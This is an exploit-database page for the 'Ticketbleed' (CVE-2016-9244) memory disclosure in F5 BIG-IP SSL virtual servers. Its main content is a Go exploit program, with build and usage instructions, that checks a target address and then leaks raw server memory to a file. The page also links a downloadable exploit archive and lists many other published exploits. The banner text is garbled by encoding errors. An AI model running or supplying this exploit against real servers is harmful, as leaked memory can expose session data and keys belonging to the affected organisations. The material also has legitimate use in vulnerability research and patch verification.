Menu

Search for hundreds of thousands of exploits

"F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure"

Author

Exploit author

"Ege Balci"

Platform

Exploit platform

hardware

Release date

Exploit published date

2017-02-10

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
/*
# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
# Date: [10.02.2017]
# Exploit Author: [Ege Balcı]
# Vendor Homepage: [https://f5.com/]
# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
# Tested on: [Multiple]
# CVE : [CVE-2016-9244]




BUILD:
	go get github.com/EgeBalci/Ticketbleed
	go build Ticketbleed.go

USAGE:
	./ticketbleed <options> <ip:port>
OPTIONS:
	-o, --out 	Output filename for raw memory
	-s, --size 	Size in bytes to read
	-h, --help 	Print this message

*/
package main

import "github.com/EgeBalci/Ticketbleed"
import "strconv"
import "strings"
import "fmt"
import "os"


var OutputFile string = ""
var BleedSize int = 0

func main() {


	ARGS := os.Args[1:]
	if len(ARGS) < 1 || len(ARGS) > 5{
		fmt.Println(Help)
		os.Exit(1)
	}

  	for i := 0; i < len(ARGS); i++{

		if ARGS[i] == "-h" || ARGS[i] == "--help"{
			fmt.Println(Help)
			os.Exit(1)
	  	}

		if ARGS[i] == "-o" || ARGS[i] == "--out"{
			OutputFile = ARGS[i+1]
	  	}

	  	if ARGS[i] == "-s" || ARGS[i] == "--size"{
	  		Size,err := strconv.Atoi(ARGS[i+1])
	  		if err != nil {
	  			fmt.Println("[-] ERROR: Invalid size value !")
	  			os.Exit(1)
	  		}
	  		if Size < 0 {
	  			fmt.Println("[-] ERROR: Size can't be smaller than 0")
	  			os.Exit(1)
	  		}else{
	  			BleedSize = Size
	  		}
	  	}
 	}

	if OutputFile != "" {
		File, FileErr := os.Create(OutputFile)
		if FileErr != nil {
			fmt.Println("[-] ERROR: While creating output file !")
			os.Exit(1)
		}
		File.Close()
		fmt.Println("[*] Output file: "+OutputFile)
	}

 	VulnStatus := Ticketbleed.Check(ARGS[0])								// First check if it's vulnerable
 	fmt.Println(VulnStatus)
 	if strings.Contains(VulnStatus, "[+]") {
 		
 		go Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))  		// With using multiple threads it is easyer to move on stack
 		Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))				// Othervise server echoes back alot of duplicate value
 	}

}



var Help string = `
â–„â–„â–„âˆâˆâˆâˆâˆâ–“ âˆâˆâ–“ â–„âˆâˆâˆâˆâ–„   âˆâˆ â–„âˆâ–€â–“âˆâˆâˆâˆâˆâ–„â–„â–„âˆâˆâˆâˆâˆâ–“ â–„â–„â–„â–„    âˆâˆâ–“    â–“âˆâˆâˆâˆâˆ â–“âˆâˆâˆâˆâˆ â–“âˆâˆâˆâˆâˆâ–„ 
â–“  âˆâˆâ–’ â–“â–’â–“âˆâˆâ–’â–’âˆâˆâ–€ ▀∠  âˆâˆâ–„âˆâ–’ ▓∠  ▀▓  âˆâˆâ–’ â–“â–’â–“âˆâˆâˆâˆâˆâ–„ â–“âˆâˆâ–’    ▓∠  â–€ ▓∠  â–€ â–’âˆâˆâ–€ âˆâˆâŒ
â–’ â–“âˆâˆâ–‘ â–’â–‘â–’âˆâˆâ–’▒▓∠   â–„ â–“âˆâˆâˆâ–„â–‘ â–’âˆâˆâˆ  â–’ â–“âˆâˆâ–‘ â–’â–‘â–’âˆâˆâ–’ â–„âˆâˆâ–’âˆâˆâ–‘    â–’âˆâˆâˆ   â–’âˆâˆâˆ   â–‘âˆâˆ   âˆâŒ
â–‘ â–“âˆâˆâ–“ â–‘ â–‘âˆâˆâ–‘â–’â–“â–“â–„ â–„âˆâˆâ–’â–“âˆâˆ âˆâ–„ ▒▓∠ â–„â–‘ â–“âˆâˆâ–“ â–‘ â–’âˆâˆâ–‘âˆâ–€  â–’âˆâˆâ–‘    ▒▓∠ â–„ ▒▓∠ â–„ â–‘â–“âˆâ–„   âŒ
  â–’âˆâˆâ–’ â–‘ â–‘âˆâˆâ–‘â–’ â–“âˆâˆâˆâ–€ â–‘â–’âˆâˆâ–’ âˆâ–„â–‘â–’âˆâˆâˆâˆâ–’ â–’âˆâˆâ–’ â–‘ ░▓∠ â–€âˆâ–“â–‘âˆâˆâˆâˆâˆâˆâ–’â–‘â–’âˆâˆâˆâˆâ–’â–‘â–’âˆâˆâˆâˆâ–’â–‘â–’âˆâˆâˆâˆâ–“ 
  â–’ â–‘â–‘   â–‘â–“  â–‘ â–‘â–’ â–’  â–‘â–’ â–’â–’ â–“â–’â–‘â–‘ â–’â–‘ â–‘ â–’ â–‘â–‘   â–‘â–’â–“âˆâˆâˆâ–€â–’â–‘ â–’â–‘â–“  â–‘â–‘â–‘ â–’â–‘ â–‘â–‘â–‘ â–’â–‘ â–‘ â–’â–’â–“  â–’ 
    â–‘     â–’ â–‘  â–‘  â–’   â–‘ â–‘â–’ â–’â–‘ â–‘ â–‘  â–‘   â–‘    â–’â–‘â–’   â–‘ â–‘ â–‘ â–’  â–‘ â–‘ â–‘  â–‘ â–‘ â–‘  â–‘ â–‘ â–’  â–’ 
  â–‘       â–’ â–‘â–‘        â–‘ â–‘â–‘ â–‘    â–‘    â–‘       â–‘    â–‘   â–‘ â–‘      â–‘      â–‘    â–‘ â–‘  â–‘ 
          â–‘  â–‘ â–‘      â–‘  â–‘      â–‘  â–‘         â–‘          â–‘  â–‘   â–‘  â–‘   â–‘  â–‘   â–‘    
             â–‘                                    â–‘                        â–‘      

Author: Ege Balci
Github: github.com/EgeBalci


USAGE: 
	./ticketbleed <ip:port> <options> 
OPTIONS:
	-o, --out 	Output filename for raw memory
	-s, --size 	Size in bytes to read
	-h, --help 	Print this message
`

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41298.zip
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-30 "Intelbras Router RF 301K 1.1.2 - Authentication Bypass" webapps hardware "Kaio Amaral"
2020-11-30 "ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure" webapps hardware "Zagros Bingol"
2020-11-27 "Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution" webapps hardware "Emre SUREN"
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-11-23 "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass" webapps hardware malwrforensics
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
Release Date Title Type Platform Author
2019-08-14 "Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-08 "Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2018-09-12 "LG Smart IP Camera 1508190 - Backup File Download" webapps hardware "Ege Balci"
2017-02-10 "F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure" remote hardware "Ege Balci" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected